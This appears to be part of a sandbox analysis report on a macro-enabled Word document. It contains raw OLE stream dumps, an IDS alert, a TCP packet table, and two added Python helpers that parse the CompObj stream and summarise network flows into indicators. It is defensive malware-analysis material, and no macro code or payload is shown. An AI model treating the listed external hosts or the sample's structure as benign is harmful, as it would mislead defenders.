Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
Entropy: 4.63438395848
Base64 Encoded: True
Data ASCII: V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw: 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
Entropy: 1.54052096453
Base64 Encoded: False
Data ASCII: . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
Entropy: 0.0
Base64 Encoded: False

                                                                                                                              Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62402723855
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62202697924
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 5 . . C a p t i o n = " U s e r F o r m 5 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 35 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 35 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                              Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5949
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                              File Type:data
                                                                                                                              Stream Size:5949
                                                                                                                              Entropy:5.26993168344
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                              Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1039
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/dir
                                                                                                                              File Type:data
                                                                                                                              Stream Size:1039
                                                                                                                              Entropy:6.60831708882
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . d . m . . A . ! O f f i c .
                                                                                                                              Data Raw:01 0b b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 99 86 d0 61 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                                                                                                              Stream Path: WordDocument, File Type: data, Stream Size: 43108
                                                                                                                              General
                                                                                                                              Stream Path:WordDocument
                                                                                                                              File Type:data
                                                                                                                              Stream Size:43108
                                                                                                                              Entropy:3.69797214633
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8c a3 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a8 00 00 70 61 21 5c 70 61 21 5c 8c 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
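The `\x1CompObj` streams dumped above (UserForm4 and UserForm5 are byte-identical) carry the object's registered type name, which is what lets an analyst confirm these are Forms 2.0 UserForms without opening the file in Office. Below is an added example, not part of the Joe Sandbox report and not tooling from Joe Security, that parses that stream according to the MS-OLEDS CompObjStream layout (28-byte header, length-prefixed ANSI user type, clipboard-format marker or string, reserved string, optional Unicode marker followed by Unicode copies of the same fields). The 97 raw bytes are pasted from the UserForm4 dump above as the sample input; the `STANDARD_CF` names are a small illustrative subset of the Windows clipboard format ids.

```python
import struct

# The 97-byte Macros/UserForm4/\x01CompObj dump from the report above, used as sample input.
COMPOBJ_HEX = (
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 "
    "10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 "
    "00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00"
)

HEADER_LEN = 28               # CompObjHeader: Reserved1(4) Version(4) Reserved2(20)
HEADER_MAGIC = 0xFFFE0001     # bytes 01 00 fe ff, little-endian
UNICODE_MARKER = 0x71B239F4   # bytes f4 39 b2 71; present only when Unicode fields follow
STANDARD_CF = {2: "CF_BITMAP", 3: "CF_METAFILEPICT", 8: "CF_DIB", 14: "CF_ENHMETAFILE"}  # illustrative subset


def _ansi(buf: bytes, off: int):
    """LengthPrefixedAnsiString: u32 byte count (incl. NUL) followed by that many bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    s = buf[off:off + n].split(b"\x00", 1)[0].decode("latin-1") if n else ""
    return s, off + n


def _unicode(buf: bytes, off: int):
    """LengthPrefixedUnicodeString: u32 count of UTF-16 code units (incl. NUL), then the string."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    s = buf[off:off + 2 * n].decode("utf-16-le").split("\x00", 1)[0] if n else ""
    return s, off + 2 * n


def _cf_or_string(buf: bytes, off: int, reader):
    """ClipboardFormatOr{Ansi,Unicode}String: 0 = absent, 0xFFFFFFFF/0xFFFFFFFE = u32 CF_* id,
    any other value is the length of a string that follows."""
    (marker,) = struct.unpack_from("<I", buf, off)
    if marker == 0:
        return None, off + 4
    if marker in (0xFFFFFFFF, 0xFFFFFFFE):
        (cf,) = struct.unpack_from("<I", buf, off + 4)
        return STANDARD_CF.get(cf, cf), off + 8
    return reader(buf, off)


def parse_compobj(data: bytes) -> dict:
    """Parse a CompObjStream and return the strings that identify the embedded object."""
    if len(data) < HEADER_LEN:
        raise ValueError("CompObj stream shorter than its 28-byte header")
    magic, version = struct.unpack_from("<II", data, 0)
    if magic != HEADER_MAGIC:
        raise ValueError(f"bad CompObj header magic 0x{magic:08x}")
    out = {"version": version}
    off = HEADER_LEN
    out["ansi_user_type"], off = _ansi(data, off)
    out["ansi_clipboard_format"], off = _cf_or_string(data, off, _ansi)
    # Reserved1 carries a string only when 0 < length <= 0x28; otherwise only the 4-byte length is present.
    (rlen,) = struct.unpack_from("<I", data, off)
    if 0 < rlen <= 0x28:
        _, off = _ansi(data, off)
    else:
        off += 4
    out["unicode_user_type"] = out["unicode_clipboard_format"] = None
    if off + 4 <= len(data) and struct.unpack_from("<I", data, off)[0] == UNICODE_MARKER:
        off += 4
        out["unicode_user_type"], off = _unicode(data, off)
        out["unicode_clipboard_format"], off = _cf_or_string(data, off, _unicode)
        _, off = _unicode(data, off)   # Reserved2, ignored
    out["consumed"] = off              # equals len(data) when every field was accounted for
    return out


if __name__ == "__main__":
    print(parse_compobj(bytes.fromhex(COMPOBJ_HEX)))
```

On the dump above the parser returns `ansi_user_type` "Microsoft Forms 2.0 Form" and `ansi_clipboard_format` "Embedded Object", with all 97 bytes consumed; the Unicode fields are present but empty. Feeding it a stream whose `consumed` value falls short of the stream size is a quick way to flag a CompObj stream that has been padded or tampered with.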

                                                                                                                              Network Behavior

                                                                                                                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/01/21-23:18:24.263263 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 70.32.23.44 | 192.168.2.22
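The packet table that follows lists one line per TCP segment, which is hard to read as traffic; what an analyst wants is the list of conversations, their direction and the external endpoints to block. The following is an added example, not part of the Joe Sandbox report, that groups packet rows into client-to-server flows keyed from the sandbox side and extracts the external `ip:port` pairs. The `PACKETS` text is a constructed subset of the rows in the report's TCP packet list, written with `|` separators in the report's column order (timestamp, source port, dest port, source IP, dest IP); the sandbox network `192.168.2.0/24` is assumed from the addresses in the report.

```python
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumed from the report's addresses: the sandbox client sits in 192.168.2.0/24.
SANDBOX_NET = ip_network("192.168.2.0/24")

# Constructed subset of the report's "TCP Packets" rows:
# timestamp | source port | dest port | source ip | dest ip
PACKETS = """\
Feb 1, 2021 23:25:15.806587934 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:15.843477964 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:15.843609095 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.605983019 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.912554979 CET | 49744 | 443 | 192.168.2.4 | 35.208.182.43
Feb 1, 2021 23:25:17.065234900 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.592715025 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
"""


def parse_ts(s: str) -> datetime:
    """'Feb 1, 2021 23:25:15.806587934 CET' -> naive datetime; the 9-digit fraction is cut to microseconds."""
    body = s.rsplit(" ", 1)[0]          # drop the zone label
    base, frac = body.rsplit(".", 1)
    return datetime.strptime(base, "%b %d, %Y %H:%M:%S") + timedelta(microseconds=int(frac[:6].ljust(6, "0")))


def parse_packets(text: str) -> list:
    """Turn the delimited rows into dicts; ports become ints, addresses are validated."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = [f.strip() for f in line.split("|")]
        rows.append({"ts": parse_ts(ts), "sport": int(sport), "dport": int(dport),
                     "src": str(ip_address(sip)), "dst": str(ip_address(dip))})
    return rows


def summarize_flows(rows: list) -> dict:
    """Group segments into conversations keyed (client ip, client port, server ip, server port),
    treating any segment that leaves the sandbox network as outbound."""
    flows = {}
    for p in rows:
        outbound = ip_address(p["src"]) in SANDBOX_NET
        key = ((p["src"], p["sport"], p["dst"], p["dport"]) if outbound
               else (p["dst"], p["dport"], p["src"], p["sport"]))
        f = flows.setdefault(key, {"out": 0, "in": 0, "first": p["ts"], "last": p["ts"]})
        f["out" if outbound else "in"] += 1
        f["first"] = min(f["first"], p["ts"])
        f["last"] = max(f["last"], p["ts"])
    return flows


def external_endpoints(flows: dict) -> list:
    """Sorted 'ip:port' strings for every server outside the sandbox network."""
    return sorted({f"{srv}:{port}" for (_, _, srv, port) in flows if ip_address(srv) not in SANDBOX_NET})


if __name__ == "__main__":
    flows = summarize_flows(parse_packets(PACKETS))
    for (cip, cport, sip, sport), f in flows.items():
        dur = (f["last"] - f["first"]).total_seconds()
        print(f"{cip}:{cport} -> {sip}:{sport}  out={f['out']} in={f['in']}  {dur:.3f}s")
    print("external endpoints:", external_endpoints(flows))
```

Run against the full table the same code yields the two port-443 conversations the report shows, `192.168.2.4:49742 -> 194.209.195.106:443` and `192.168.2.4:49744 -> 35.208.182.43:443`, which together with the 403 served by 70.32.23.44 on port 80 in the Snort alert are the network indicators worth carrying into detection rules.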

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 1, 2021 23:25:15.806587934 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:15.843477964 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:15.843609095 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:15.867645025 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:15.905683994 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:15.906677008 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:15.906698942 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:15.906718016 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:15.906827927 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:15.912910938 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:15.950129032 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:15.977408886 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.050429106 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.519890070 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.519928932 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.519994020 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.520045996 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.520076036 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.520131111 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.520162106 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.520207882 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.520266056 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.520273924 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.520302057 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.520325899 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.520396948 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.555680990 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.555725098 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.555757046 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.555811882 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.555843115 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.555895090 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.555923939 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.555928946 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.555954933 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.556022882 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.556052923 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.556056976 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.556062937 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.556098938 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.556129932 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.556180000 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.556206942 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.556235075 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.556243896 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.556257010 CET | 443 | 49742 | 194.209.195.106 | 192.168.2.4
Feb 1, 2021 23:25:16.556524992 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.605983019 CET | 49742 | 443 | 192.168.2.4 | 194.209.195.106
Feb 1, 2021 23:25:16.912554979 CET | 49744 | 443 | 192.168.2.4 | 35.208.182.43
Feb 1, 2021 23:25:17.065234900 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.065489054 CET | 49744 | 443 | 192.168.2.4 | 35.208.182.43
Feb 1, 2021 23:25:17.065936089 CET | 49744 | 443 | 192.168.2.4 | 35.208.182.43
Feb 1, 2021 23:25:17.218677998 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.220899105 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.220958948 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.221002102 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.221103907 CET | 49744 | 443 | 192.168.2.4 | 35.208.182.43
Feb 1, 2021 23:25:17.233995914 CET | 49744 | 443 | 192.168.2.4 | 35.208.182.43
Feb 1, 2021 23:25:17.386765003 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.388068914 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.394598961 CET | 49744 | 443 | 192.168.2.4 | 35.208.182.43
Feb 1, 2021 23:25:17.547605991 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.592668056 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.592698097 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
Feb 1, 2021 23:25:17.592715025 CET | 443 | 49744 | 35.208.182.43 | 192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592751980 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592784882 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592812061 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592839956 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592868090 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592899084 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592926025 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.593077898 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.593157053 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.745815992 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745874882 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745932102 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745985985 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746015072 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746037006 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746067047 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746088982 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746139050 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746156931 CET49744443192.168.2.435.208.182.43
